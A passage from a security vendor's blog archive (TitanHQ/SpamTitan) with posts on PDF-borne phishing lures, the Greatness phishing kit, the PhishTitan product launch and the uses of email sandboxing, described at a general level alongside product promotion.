Ursnif banking\r\nTrojan and WikiLoader malware. Recent campaigns distributing these malware variants have used parcel delivery\r\nlures with PDF file attachments that contain a link that prompts the user to download a fake invoice. Instead of the\r\ninvoice, a zip file is downloaded that contains a JavaScript file. If executed, the JavaScript file downloads an\r\narchive, extracts the contents, and executes the malware payload. Another campaign uses PDF files to install the\r\nAgent Tesla remote access trojan using Booking.com-related lures.\r\nNot only do PDF files have a greater chance of evading email security solutions, they are also more trusted by end\r\nusers than Office file attachments. Security awareness campaigns are often focused on training employees about\r\nthe risks of phishing, such as clicking links in unsolicited emails and the risks of opening unsolicited office files.\r\nMalicious email campaigns using PDF files arouse less suspicion and end users are more likely to be tricked by\r\nthese campaigns.\r\nIt is important for businesses to incorporate PDF files into their security awareness training and phishing\r\nsimulation campaigns to better prepare employees for this growing threat. With SafeTitan, adding new content in\r\nresponse to the changing tactics, techniques, and procedures of threat actors is a quick and easy process. Get in\r\ntouch with the TitanHQ team today to find out more about the SafeTitan security awareness training and phishing\r\nsimulation platform and discover the difference the solution can make to your organization’s security posture.\r\nBusiness Microsoft 365 Accounts Attacks Using Greatness Phishing Kit\r\nby G Hunt | January 31, 2024 | Phishing \u0026 Email Spam\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 104 of 136\n\nPhishing has long been the most common way that cybercriminals gain initial access to business networks. A\r\nsuccessful attack allows a threat actor to steal credentials and gain a foothold in the network, providing access to\r\nsensitive data and giving them the access they need to conduct a range of nefarious actions. Phishers must develop\r\ncampaigns that are capable of bypassing email security solutions and use lures that are likely to fool end users into\r\ndisclosing their credentials or opening malicious email attachments. In recent years, the entry barrier for\r\nconducting phishing campaigns has been significantly lowered through phishing-as-a-service (PhaaS), which has\r\nproven popular with would-be cybercriminals.\r\nPhishing kits are offered that provide everything needed to launch successful phishing campaigns, without having\r\nto spend hours setting up the infrastructure, creating convincing emails, and incorporating anti-detection measures\r\nto ensure emails land in inboxes. A relatively new phishing kit is proving to be particularly popular. The Greatness\r\nphishing kit has been available since mid-2022 and lowers the bar for starting phishing campaigns, requiring a\r\npayment of just $120 a month to use the kit. The Greatness phishing kit allows emails to be customized to suit the\r\nhacker’s needs and add attachments, links, or QR codes to the emails. The kit makes it easy to generate and send\r\nemails and create obfuscated messages that can bypass many cybersecurity solutions and land in inboxes. The kit\r\nalso supports multi-factor authentication (MFA) bypass by performing a man-in-the-middle attack to steal\r\nauthentication codes and can be integrated with Telegram bots.\r\nThe kit has an attachment and link builder that creates convincing login pages for harvesting Microsoft 365\r\ncredentials and even pre-fills the victim’s email address into the login box, only requiring them to enter their\r\npassword. The kit also adds the targeted company’s logo to the phishing page along with a background image that\r\nis extracted from the targeted organization’s M365 login page. As such, the Greatness phishing kit is aimed at\r\nindividuals looking to target businesses and can be easily purchased through the developer’s Telegram channel.\r\nThere were several spikes in Greatness phishing kit activity in 2023, with the latest detected in December 2023\r\nand the increased activity has continued into 2024. Phishing kits such as Greatness significantly lower the barrier\r\nfor entry to cybercrime and make it as easy as possible to start phishing, and the low cost of the kit has made it an\r\nattractive option for would-be cybercriminals. This phishing kit is used to target Microsoft 365 users, and the\r\nemails can be convincing and are likely to fool many end users.\r\nThe key to defending against phishing attacks is to implement layered defenses to ensure that a failure of one\r\ndefensive measure does not leave the business unprotected. TitanHQ has developed a suite of cybersecurity\r\nsolutions for businesses and the MSPs that serve them to improve their defenses against phishing, including AI-generated phishing emails and sophisticated phishing kits capable of stealing passwords and MFA codes.\r\nTitanHQ’s PhishTitan provides advanced phishing protection and remediation for Microsoft 365. TitanHQ’s\r\nproprietary machine-learning algorithm integrates directly with Microsoft 365 and catches and remediates\r\nsophisticated phishing including AI-generated phishing emails, business email compromise, spear phishing, and\r\nphishing attacks that bypass MFA. The solution augments rather than replaces EOP and Defender and catches the\r\nphishing attempts that those defensive measures often miss.\r\nPhishTitan uses AI and a large language model (LLM) with proprietary threat intelligence currently not found in\r\nany other anti-phishing solution on the market, and will scan attachments for malicious links and malware, rewrite\r\nURLs, apply banner notifications, and block malicious links. PhishTitna also provides time-of-click protection to\r\ncombat the weaponization of links after delivery. The solution uses machine learning algorithms to scan the\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 105 of 136\n\nmessage body to assess email content and identify words, phrasing, and formatting of emails indicating a phishing\r\nattempt, and will learn over time and become even more effective.\r\nPhishTitan is suitable for businesses of all types and sizes and has been developed from the ground up to meet the\r\nneeds of MSPs. The solution can be set up in less than 10 minutes, and MSPs can add new clients in less than 6\r\nminutes and start protecting them from highly sophisticated phishing attacks. For maximum protection, TitanHQ\r\nalso offers WebTitan DNS filter to protect against web-based attacks, ArcTitan email archiving for security and\r\ncompliance, EncryptTitan for email encryption, SafeTitan for security awareness training and phishing\r\nsimulations, and the SpamTitan Suite of email security solutions. All products are available on a no-obligation,\r\n100% free trial and product demonstrations are available on request. For more information on PhishTitan and\r\nother TitanHQ solutions, give the TitanHQ team a call today.\r\nTitanHQ Launches PhishTitan – AI-Driven Phishing Protection for M365\r\nby G Hunt | January 14, 2024 | Industry News, Phishing \u0026 Email Spam\r\nTitanHQ is proud to announce the addition of a new solution to its cybersecurity portfolio that helps businesses\r\ncombat the growing threat of phishing. PhishTitan provides powerful phishing protection for Microsoft 365 that is\r\ncapable of catching and remediating sophisticated phishing attempts, including spear phishing attacks, business\r\nemail compromise, phishing emails generated by artificial intelligence tools, and zero-day phishing threats that\r\nMicrosoft’s native defenses for M365 fail to detect and block. It is these threats that pose the biggest threat since\r\nthey are missed by Microsoft’s email security defenses and are difficult for employees to identify as malicious\r\nsince they lack many of the red flags that employees are taught to look out for in security awareness training\r\nprograms.\r\nPhishTitan incorporates TitanHQ’s proprietary machine-learning algorithm, which integrates directly with M365.\r\nPhishTitan performs an AI-driven analysis of inbound emails (internal and external) which includes textual\r\nanalysis, link analysis, and attachment scanning. Links are analyzed via multiple curated feeds that constantly\r\nupdate the solution to allow malicious websites linked to phishing and malware distribution to be identified and\r\nblocked. Phishing emails often include links that have been masked to hide the true destination URL. PhishTitan\r\nrewrites URLs to show the true destination. One tactic used by phishers to bypass email security solutions is to\r\nonly weaponize links in emails after delivery. To protect against this tactic, PhishTitan checks inbound emails\r\nbefore delivery to inboxes and also offers time-of-click protection against malicious links in emails.\r\nAttachments are scanned with twin antivirus engines, and suspicious email attachments are sent to the sandbox for\r\nbehavioral analysis. Machine learning detection models scour the body of emails looking for tell-tale signs of\r\nphishing and adapt to constantly changing phishing tactics.  The machine learning algorithms also learn from\r\nreports of phishing attempts by end users, which they can report with a single click using a TitanHQ-supplied\r\nOutlook add-in. PhishTitan can also be configured to apply banner notifications to external emails and protect\r\nagainst the leakage of sensitive company information.\r\nThe solution has been designed to meet the needs of businesses of all types and sizes and has been developed from\r\nthe ground up to meet the needs of managed service providers (MSPs) to allow them to easily add advanced\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 106 of 136\n\nphishing protection to their service stacks. It takes around 10 minutes to set up the solution, and around 6 minutes\r\nfor MSPs to onboard new clients.\r\nThe solution was trialed across the TitanHQ user database of more 12,000 customers and 3,000 MSPs in Q4,\r\n2023, with TitanHQ customers reporting that the solution outperforms their existing anti-phishing solutions.\r\nTitanHQ is now pleased to start offering the new product to new customers. For more information on PhishTitan\r\nphishing protection Microsoft 365 contact TitanHQ today. PhishTitan is available on a 14-day free trial and\r\nproduct demonstrations can be arranged on request to show you how easy the product is to use and exactly what it\r\ncan do.\r\n“A staggering 71% of MS business users suffer at least one compromised account monthly. With this in mind, the\r\noverwhelming feedback from our customer base has been that phishing is the number one problem to solve in the\r\nemail security community,” said TitanHQ CEO, Ronan Kavanagh. “We therefore allocated resources and\r\ninvestment to develop a solution with new, cutting-edge, robust, fast phishing threat intelligence driven by a team\r\nof security specialists. We are pleased to be able to meet the market’s needs with a product that delivers.”\r\nAdvantages and Disadvantages of Email Sandboxing\r\nby G Hunt | November 10, 2023 | Network Security, Spam Software\r\nSandboxing is the use of a virtual environment for testing code and safely opening untrusted files. The sandbox is\r\nan isolated and secure environment that emulates a legitimate endpoint; however, there are no connections to the\r\nbusiness network, the sandbox environment contains no real data, and if dangerous code is executed, no harm will\r\nbe caused.\r\nAdvantages of Email Sandboxing\r\nSandboxing is important because of the sheer number and complexity of threats faced by businesses.\r\nCybercriminal groups are conducting increasing numbers of attacks, new groups are constantly being formed, and\r\ntheir attacks are becoming much more sophisticated. The cost of these attacks and the resultant data breaches are\r\nalso spiraling. According to the 2023 Cost of a Data Breach Report from IBM, on average, data breaches cost\r\n$4.45 million to resolve in the United States and $10.93 million for a healthcare data breach.\r\nMany of these threats come from email. Emails are used to send attachments containing malicious code that\r\ndownloads malware that provides a cyber actor with access to the network. Links to malicious websites are also\r\ndistributed via email where malware is downloaded. While businesses have a degree of protection if they have\r\nanti-virus software installed, most anti-virus solutions can only detect known malware variants – Malware that has\r\npreviously been analyzed and had its signature added to the solution’s malware definition list. Antivirus solutions\r\nwill not detect new malware variants nor fileless malware, which is executed in the memory with no files\r\ndownloaded to the disk.\r\nSandboxing provides an additional layer of protection against zero-day malware and ransomware attacks and will\r\nallow malicious files to be identified, detected, and quarantined before they can do any harm, even if they have not\r\npreviously been encountered. In the sandbox, malware is identified by the actions it tries to perform, not by any\r\nsignature.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 107 of 136\n\nDisadvantages of Email Sandboxing\r\nWhile there are clear benefits, there are some disadvantages of email sandboxing. Businesses may want to add\r\nemail sandboxing to their cybersecurity arsenal, but email sandboxes can be complicated to set up and run, and\r\nthey can require a considerable amount of resources and can be expensive to run. Another of the disadvantages of\r\nemail sandboxing is analyzing file attachments takes time and messages cannot be delivered until all checks have\r\nbeen performed. It is therefore inevitable that there will be email delivery delays.\r\nAs with any cybersecurity solution, there is the potential for false positives. An email attachment may be\r\ndetermined to be malicious when it is actually harmless. In such cases, important business emails may be blocked\r\nor deleted. The last main disadvantage is malware often contains code that determines if it has landed on the\r\ntargeted endpoint or if it is in a virtual environment. If the latter is detected, the malware may delete itself or not\r\nperform any of its programmed malicious actions. Considering the cost of a successful cyberattack, the advantages\r\nof email sandboxing outweigh the disadvantages, provided the right sandboxing solution is chosen.\r\nSpamTitan Email Security with Sandboxing\r\nSpamTitan is an award-winning email security solution from TitanHQ that provides advanced threat protection at\r\nan affordable price. The solution is easy to implement and use and protects thousands of SMBs and managed\r\nservice providers (MSPs) by blocking spam, viruses, malware, ransomware, and links to malicious websites from\r\nyour emails. SpamTitan’s ATP defense uses inbuilt Bayesian auto-learning and heuristics to defend against\r\nadvanced threats and evolving cyberattack techniques and features an integrated email sandbox tool that is part of\r\nBitdefender’s Global Protective Network.\r\nSpamTitan uses advanced intelligent technologies, such as AI, to predict and prevent advanced threats and the\r\nsandbox accurately mimics a real endpoint to trick malware into determining it has reached its intended target. As\r\nwith any sandbox, there are delays in delivering emails but this is kept to a minimum. SpamTitan has multiple\r\nlayers of security and sophisticated sandbox technology, which means only specific and dangerous emails will be\r\nsandboxed. Even if a legitimate email lands in a sandbox, the delivery delay will be, at most, twenty minutes.\r\nWhile there may be false positives on occasion, no emails are deleted. They are quarantined to allow\r\nadministrators to check the validity of the results.\r\nIf you want to improve security and get the advantages of email sandboxes while eliminating the disadvantages,\r\ngive the TitanHQ team a call today. SpamTitan is also available on a free 14-day trial to allow you to test the\r\nproduct and sandbox in your own environment before making a purchase decision.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 108 of 136\n\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nMalicious File Sandbox for Email\r\nby G Hunt | November 5, 2023 | Network Security, Spam Software\r\nMultiple layers of security are required to protect against increasingly sophisticated email attacks. A malicious file\r\nsandbox for email should be one of those layers to ensure your business is protected against zero-day and stealthy\r\nmalware threats.\r\nEmail: The Most Common Initial Access Vector Used by Cybercriminals\r\nThere are many ways that cybercriminals can attack businesses, but email is the most common initial access\r\nvector. Most employees have email accounts which means they can be easily reached, and social engineering\r\ntechniques are used to trick employees into opening malicious attachments or visiting links in emails.\r\nCybercriminals have become adept at exploiting human weaknesses in defenses.\r\nOne of the main aims of email campaigns is to deliver malware to provide persistent access to victims’ networks.\r\nExecutable files may be attached to emails and hidden using double file extensions to make the files appear to be\r\nlegitimate documents, PDF files, or spreadsheets. Office files may be attached that have malicious macros which,\r\nif allowed to run, trigger the download of a first-stage malware payload. The problem for businesses is these\r\ncampaigns are becoming much more sophisticated, they often bypass standard email security defenses, and they\r\nland in inboxes where they can be opened by employees.\r\nDefending against sophisticated email attacks requires a defense-in-depth approach, which should include a spam\r\nfilter/secure email gateway, a web filter, multifactor authentication, an endpoint detection and response solution,\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 109 of 136\n\nand security awareness training for employees. To improve protection further and defend against new and stealthy\r\nmalware threats, it is important to have a malicious file sandbox for email.\r\nWhat is a Malicious File Sandbox?\r\nA malicious file sandbox is an isolated virtual environment where untrusted, suspicious files can be detonated\r\nsecurely without risking network or data security. The sandbox is used for analyzing emails, documents,\r\napplication files, and other executable files to determine their true nature. When an email is received, it must first\r\npass through a spam filter which looks for the common signatures of spam and phishing emails, performs\r\nreputation checks on the sender, analyzes the message content, and scans email attachments using antivirus\r\nsoftware. The spam filter will filter out the majority of spam and phishing emails and all known malware variants\r\nusing the antivirus software.\r\nThe problem is many email attacks are stealthy and have been developed to be undetectable, and cyber actors are\r\nskilled at getting their emails past email defenses and into inboxes. One way this is achieved is by using\r\npolymorphic malware, which cannot be detected by standard email security solutions and antivirus software. A\r\nmalicious file sandbox is needed to protect against these novel threats.\r\nWhen suspicious files are received that pass the front-end checks, they are sent to the sandbox for in-depth\r\nanalysis of their behavior. The malicious file sandbox is configured to look like a real target environment to ensure\r\nthat when an email is sent to the sandbox any malware acts as it would in the wild and is tricked into determining\r\nthat it has landed on the endpoint of its intended target. No harm can be caused in the sandbox as the environment\r\nis isolated and not set up locally. If malware is detected, a report is generated of any malicious intent or\r\nunexpected actions, and actionable insights are provided to allow the threat to be blocked.\r\nThe SpamTitan Malicious File Sandboxing Service\r\nSpamTitan is an award-winning anti-spam and anti-phishing solution from TitanHQ that is used by thousands of\r\nbusinesses and managed service providers to protect against email-based attacks. The solution leverages artificial\r\nintelligence and machine learning algorithms to detect novel threats and predict new attacks, reputation checks are\r\nconducted using SPF, DKIM, and DMARC, users are protected from malicious links in emails, and the solution\r\nhas dual antivirus engines that scan for known malware.\r\nSpamTitan also includes a Bitdefender-powered malicious file sandbox for blocking zero-day malware threats.\r\nThe sandbox analyzes a broad range of targets, including emails, documents, application files, and other\r\nexecutable files, and leverages purpose-built, advanced machine-learning algorithms, aggressive behavior\r\nanalysis, anti-evasion techniques, and memory snapshot comparison to detect sophisticated threats and delivers\r\nadvanced threat protection and zero-day exploit detection. The sandbox also extracts, analyzes, and validates\r\nURLs within files.\r\nThe sandbox is not located on the endpoint so there are no performance implications, and strong machine learning\r\nand behavior detection technologies ensure that only files that require further analysis are sent to the Sandbox. If a\r\nmalicious file is detected, the sandbox informs Bitdefender’s cloud threat intelligence service to ensure the threat\r\nis instantly blocked globally and will not need to be set to the sandbox for analysis again. The sandbox allows\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 110 of 136\n\nbusinesses to identify and block malicious files such as polymorphic malware and other threats that have been\r\ndeveloped for use in undetectable attacks.\r\nThe SpamTitan malicious file sandbox delivers best-in-class detection, advanced anti-evasion technologies,\r\ninnovative pre-filtering, and MITRE ATT\u0026CK framework support. If you want the best protection from\r\ndangerous malware, you need a malicious file sandbox for email, and with SpamTitan you get that and more at a\r\nvery affordable price. For more information on the capabilities of SpamTitan and details of pricing, give the\r\nTitanHQ team a call. SpamTitan is also available on a free 14-day trial to allow you to test the product in your\r\nown environment before making a purchasing decision.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nWhat is Message Sandboxing?\r\nby G Hunt | October 28, 2023 | Spam Advice, Spam Software\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 111 of 136\n\nMessage sandboxing is a security feature of spam filters, secure email gateways, and other email security\r\nsolutions where inbound messages are sent to a secure and isolated environment where the messages are subjected\r\nto behavioral analysis. File attachments are detonated and analyzed for malicious properties and actions, such as\r\nattempted file downloads from the Internet, command-and-control center callbacks, and attempts to write code to\r\nthe memory.\r\nWhat is a Sandbox?\r\nIn the technology sense, a sandbox is a contained virtual environment that is separate and isolated from other\r\napplications, operating systems, data, and internal networks. Sandboxes have several uses. In software\r\ndevelopment, a sandbox is used for testing new code, where it can be observed for unexpected compatibility\r\nissues, allowing software developers to troubleshoot the code without causing any harm to live systems and data.\r\nIn cybersecurity, a sandbox is used to open untrusted files, follow potentially malicious links, and analyze\r\nsuspicious code and malware. If malware was installed and executed on a standard machine, the threat actor\r\nwould be given remote access, malware may exfiltrate sensitive data, or in the case of ransomware, encrypt files.\r\nSince the sandbox is a secure environment, any malicious action has no consequences, and files can be studied in\r\nsafety.\r\nA sandbox is a virtual environment that is often configured to mimic a genuine endpoint. One of the first actions\r\ntaken by malware is to explore the environment it is in to check whether it is on a genuine device. If not, it is\r\nlikely not to run any malicious routines and may self-delete to prevent analysis. By configuring the sandbox to\r\nmirror a genuine endpoint, the malware can be tricked into performing its malicious routines, which are detected\r\nand logged. The intelligence gathered is fed into the email security solution, and all users of that solution, locally\r\nand globally, will be protected from that malware sample in the future.\r\nWhy is Message Sandboxing Necessary?\r\nTraditional email security solutions check message headers, perform reputation checks of senders, scan email\r\nattachments with antivirus engines, follow embedded hyperlinks, and examine the content of the message for\r\nknown spam and phishing signatures. For many years, these checks alone have been sufficient and ensure that\r\nmore than 99% of spam and phishing emails are detected and blocked along with all known malware.\r\nEmail attacks have been getting much more sophisticated in recent years and new malware variants are being\r\nreleased at never-before-seen rates. A malware phishing campaign, for instance, will not just use one iteration of\r\nmalware, but many, with each sample differing sufficiently to defeat signature-based detection mechanisms.\r\nCybercriminals are using automation to spin up masses of samples and AI is being used to develop novel phishing\r\nmethods.\r\nAI and machine learning capabilities are now required in email security for blocking these zero-day threats, and\r\nemail message sandboxing is necessary for detecting novel malware threats. Advanced email security solutions\r\nleverage AI, machine learning, and email sandboxing and protect against the rapidly evolving threat landscape.\r\nWithout these features, many malicious messages will be delivered.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 112 of 136\n\nHow to Set Up Message Sandboxing\r\nThe easiest way to get started and set up message sandboxing is to use SpamTitan Email Security. SpamTitan has\r\nbeen developed to be easy to set up and use by businesses of all sizes, from small offices and coffee shops to small\r\nand medium-sized businesses and large enterprises.  Being cloud-based, there is no software to install, just a small\r\nconfiguration change to your MX record (information on how to do this is provided). The solution can be accessed\r\nthrough a web-based interface, and the solution can be configured in just a few minutes.\r\nUsers benefit from spam and phishing detection rates of more than 99.99%, a very low false positive rate and a\r\nBitdefender-powered email sandbox. The email sandbox leverages advanced machine learning algorithms,\r\naggressive behavior analysis, anti-evasion techniques, and memory snapshot comparison to detect zero-day\r\nthreats.\r\nWithout an email sandbox, you are likely to be exposed to many malicious messages. With sandbox email\r\nprotection, you have much better control of the content that reaches user inboxes.\r\nHow to Sandbox Email Attachments\r\nby G Hunt | October 15, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nDo you know how to sandbox email attachments? If you have yet to start using a sandbox for email, you will be\r\nexposed to advanced malware and phishing threats. The good news is it is quick and easy to improve protection\r\nwith a sandbox, and it requires no advanced techniques or skills, but before presenting an easy email sandboxing\r\nsolution, we should explain why email sandboxing is now a vital part of email security\r\nEmail Sandboxing Detects Advanced and Sophisticated Threats\r\nA hacker writes the code for a new malware variant or generates the code using an AI tool, and then sends that\r\nmalware via email. A traditional email security solution will not block that malware, as it has not detected it before\r\nand it doesn’t have the malware signature in its definition list. The email would most likely be delivered, and the\r\nintended recipient could open it and infect their device with malware. From there, the entire network could be\r\ncompromised and ransomware could be deployed.\r\nHow could a new, previously unseen threat be blocked? The answer is email sandboxing. When a file passes\r\ninitial checks, such as AV scans, the attachment is sent to an email sandbox where its behavior is analyzed. It\r\ndoesn’t matter if the malware has not been seen before. If the file performs any malicious actions, they will be\r\ndetected, the threat will be blocked, and if that threat is encountered again, it will be immediately neutralized.\r\nEmail sandboxing is now an essential part of email security due to the sheer number of novel malware variants\r\nnow being released. That includes brand new malware samples, malware with obfuscated code, polymorphic\r\nmalware, and known malware samples that differ just enough to avoid signature-based detection mechanisms.\r\nWithout behavioral analysis in a sandbox, these threats will be delivered.\r\nThe Easy Way to Sandbox Email Attachments\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 113 of 136\n\nSetting up an email sandbox need not be complicated and time-consuming. All you need to do is sign up for an\r\nadvanced cloud-based email security solution such as SpamTitan Email Security. SpamTitan is a 100% cloud-based email security solution that requires no software downloads or complex configurations. Just point your MX\r\nrecord to the SpamTitan Cloud and use your login credentials to access the web-based interface. You can adjust\r\nthe settings to suit your needs, and the setup process is quick, easy, and intuitive, and generally takes around 20-30\r\nminutes.\r\nThe solution is fed threat intelligence from a global network of more than 500 million endpoints, ensuring it is\r\nkept up to date and can block all known and emerging threats. You will be immediately protected from known\r\nmalware and ransomware threats, phishing emails, spam, BEC attacks, and spear phishing, and you will benefit\r\nfrom email sandboxing, where suspicious emails are sent for deep analysis to identify zero-day phishing and\r\nmalware threats.\r\nThe SpamTitan email sandbox is powered by Bitdefender and has purpose-built, advanced machine learning\r\nalgorithms, decoys and anti-evasion techniques, anti-exploit, and aggressive behavior analysis. If a file is analyzed\r\nin the sandbox and found to be malicious, SpamTitan updates Bitdefender’s Global Protective Network, ensuring\r\nthat the new threat is blocked globally.\r\nEmail sandboxing doesn’t need to be complicated. Just use SpamTitan from TitanHQ. SpamTitan is available on a\r\nfree trial, with customer support provided throughout the 14-day trial to help you get the most out of the solution.\r\nWe are sure you will love it for the level of protection provided and how easy it is to use.\r\nHow Does a Sandbox Work?\r\nby G Hunt | October 5, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nSandboxing is a security feature that protects against malicious code. Rather than execute potentially unsafe code\r\nin a standard environment, it is sent to the sandbox – an isolated environment where no harm can be caused.\r\nHow Does a Sandbox Work?\r\nA sandbox is an important cybersecurity tool for protecting host devices, operating systems, and data from being\r\nexposed to potential threats. The sandbox is a highly controlled system that is used to analyze untrusted\r\napplications, files, or code. The sandbox is isolated from the network and real data, and there are only essential\r\nresources that are authorized for use. It is not possible for a sandboxed file to access other parts of the network,\r\nresources, or the file system, only those specifically set up for the sandbox.\r\nSandboxes can have different environments. One of the most common implementations uses virtualization. A\r\nvirtual machine (VM) is set up specifically to examine suspicious programs and code. Some sandboxes include\r\nemulation of operating systems to mimic a standard endpoint. Some malware samples perform checks of their\r\nenvironment before executing malicious routines to make sure they are not in a VM. If a VM is detected, the\r\nmalware will not execute malicious routes and may self-delete to prevent analysis. By emulating a standard\r\nendpoint, these checks can be passed to allow analysis. Some sandboxes have full system emulation, which\r\nincludes the host machine’s physical hardware as well as its operating system and software. These sandboxes\r\nprovide deeper visibility into the behavior and impact of a program.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 114 of 136\n\nIn email security, files, attachments, URLs, and programs are sent to the sandbox to check whether they are benign\r\nor malicious. The analyses can take between a few seconds to a few minutes, and if any malicious activity is\r\ndetected, the file will be either quarantined and made available for further study or it will be deleted. Any other\r\ninstances of that file will be removed from the email system, and any future encounters will see the file,\r\nattachment, URL, or program deleted.\r\nSpamTitan Email Sandboxing\r\nSpamTitan Email Security includes a Bitdefender-powered email sandbox to ensure users are protected against\r\nzero-day threats. All emails are subjected to a barrage of checks and tests, including scans using two different\r\nantivirus engines. SpamTitan features strong machine learning, static analysis, and behavior detection\r\ntechnologies to ensure that only files that require deep analysis get sent to the sandbox. This is important, as\r\ndeeper analysis may take several minutes, so verified clean and safe messages will not be unduly delayed.\r\nFiles that are sent to the sandbox for deep analysis are executed and monitored for signs of malicious activity, with\r\nself-protection mechanisms in place to ensure every evasion attempt by a piece of malware is properly\r\nmarked. The sandbox has purpose-built, advanced machine learning algorithms, decoys and anti-evasion\r\ntechniques, anti-exploit, and aggressive behavior analysis. All results are checked across known threats in an\r\nextensive array of online repositories. If a malicious file is detected, the sandbox updates the Bitdefender’s cloud\r\nthreat intelligence service – the Bitdefender Global Protective Network – and the sandbox will never have to\r\nanalyze that threat again as it will be blocked globally.\r\nIf you want to improve protection against zero-day threats, give the TitanHQ team a call to find out more about\r\nSpamTitan. SpamTitan is available on a free trial to allow you to test it out in your own environment before\r\nmaking a purchase decision.\r\nAdditional Articles Related to Email Sandboxing\r\nEmail Sandboxing\r\nEmail Sandboxing Service\r\nSandboxing Blocking Malware Threats\r\nEmail Sandboxing Pattern Filtering\r\nHow does an email sandbox block malware?\r\nEmail Sandboxing and Message Delivery Delays\r\nCommonly Asked Questions about Email Sandboxing\r\nWhat is sandbox security?\r\nHow does a sandbox work?\r\nHow to sandbox email attachments\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 115 of 136\n\nWhat is message sandboxing?\r\nWhat is malware sandboxing for email?\r\nWhat is sandboxing in cybersecurity?\r\nWhat are the advantages and disadvantages of email sandboxing?\r\nSandboxing Technology for Email\r\nWhat is a malicious file sandbox for email?\r\nEmail Sandboxing is the Key to Blocking More Malware Threats\r\nby G Hunt | September 27, 2023 | Phishing \u0026 Email Spam, Spam Software\r\nhttps://www.spamtitan.com/blog/email-sandboxing-key-blocking-malware-threats/Email security solutions with\r\nemail sandboxing block more malware threats than traditional spam filters, even novel malware variants that have\r\nyet to be identified as malicious. Without this important feature, emails with malicious attachments will likely be\r\ndelivered to inboxes where they can be opened by employees. All it takes is for one employee to open a malicious\r\nfile for malware to be installed that gives a threat actor the foothold they need for a comprehensive attack on the\r\nnetwork.\r\nWhat is an Email Sandbox?\r\nIn cybersecurity terms, a sandbox is an isolated, virtual machine where potentially unsafe code can be executed in\r\nsafety, files can be subjected to deep analysis, and URLs can be visited without risk. In the sandbox, the behavior\r\nof files, code, and URLs is inspected, and since the sandbox is not networked and there is no access to real data or\r\napplications, there is no risk of causing any damage. Email sandboxing is used to identify malicious code and\r\nURLs in emails. The email sandbox mirrors standard endpoints to trick malicious actors into thinking that they\r\nhave reached their intended target. Emails may pass front-end tests that look at the reputation of the sender, email\r\nheaders, the content of the messages, and subject attachments to signature-based anti-virus tests, but there is no\r\nguarantee that the emails are safe without sandbox-based behavioral analysis.\r\nWhy is Email Sandboxing Important?\r\nCyber threat actors have been developing techniques for bypassing standard email security solutions such as\r\nembedding malicious URLs in PDF attachments, hiding malicious content in compressed files, using multiple\r\nredirects on hyperlinks, and including links to legitimate cloud-based platforms such as SharePoint for distributing\r\nmalware. Traditional email security solutions can filter out spam and phishing emails, but they often fail to block\r\nmore sophisticated threats, especially zero-day malware threats. Email sandboxing provides an extra layer of\r\nprotection against sophisticated threats such as spear-phishing emails, advanced persistent threats (APTs), and\r\nnovel malware variants.\r\nA few years ago, new malware variants were released at a fairly slow pace; however, threat actors are now using\r\nautomation and artificial intelligence to generate new malware variants at an alarming rate. Malware samples are\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 116 of 136\n\nused that deviate sufficiently from a known threat to be able to bypass signature-based detection mechanisms,\r\nensuring they reach their intended targets. Rather than just using one version of malware in their email campaigns,\r\ndozens of versions are created on a daily basis. While security awareness training will help employees identify and\r\navoid suspicious emails, threat actors have become adept at social engineering and often hoodwink employees.\r\nThe SpamTitan Email Sandbox\r\nThe SpamTitan email sandbox is a powerful next-generation security feature with award-winning machine-learning and behavioral analysis technologies. Powered by Bitdefender, the SpamTitan sandbox for email allows\r\nfiles to be safely detonated where they can do no harm. Email attachments that pass the barrage of checks\r\nperformed by SpamTitan are sent to the sandbox for deep analysis. The sandbox is a virtual environment that is\r\nconfigured to appear to be a typical endpoint and incorporates purpose-built, advanced machine learning\r\nalgorithms, decoys and anti-evasion techniques, anti-exploit, and aggressive behavior analysis. Files are 